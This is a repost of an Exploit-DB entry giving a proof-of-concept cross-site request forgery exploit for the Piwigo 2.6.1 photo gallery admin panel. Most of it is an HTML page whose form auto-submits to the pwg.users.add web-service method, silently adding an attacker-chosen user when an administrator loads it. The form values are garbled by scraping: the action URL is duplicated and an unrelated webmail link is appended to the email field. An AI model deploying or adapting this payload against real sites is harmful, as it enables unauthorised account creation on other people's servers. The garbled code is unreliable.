Piwigo 2.6.1 – Cross-Site Request Forgery

• Exploit Database
• 139 阅读

• 作者： killall-9
  日期： 2014-02-26
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/31916/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34

  # Exploit Title: piwigo 2.6.1 - CSRF # Date: 26/02/2014 # Exploit Author: killall-9@mail.com # Vendor Homepage: http://it.piwigo.org/ # Software Link: http://it.piwigo.org/basics/downloads # Version: 2.6.1 # Tested on: Virtualbox debian   A CSRF problem is present in the administration panel. Here it is a POF according to a derived POST:   <!DOCTYPE HTML PUBLIC &apos;-//W3C//DTD HTML 4.01 Transitional//EN&apos;> <html lang="en"> <head> <title>Piwigo 2.6.1</title> </head> <body> <form action="http://localhost/piwigo/ws.php?format=json&method=pwg.users.add http://localhost/piwigo/ws.php?format=json&method=pwg.users.add&lang=en " id="formid" method="post"> <input name="username" value="utente" /> <input name="password" value="utente" /> <input name="email" value="utente@gmail.com http://service.mail.com/callgate-6.73.1.0/rms/6.73.1.0/mail/getBody?folderId=1&messageId=OTg2SQZUNUQ2Occvtn5u651INxBSYcL4&purpose=display&bodyType=html# "/>   </form> <script> document.getElementById(&apos;formid&apos;).submit(); </script> </body> </html>   So you can add a new arbitrary user.     cheerz°°°°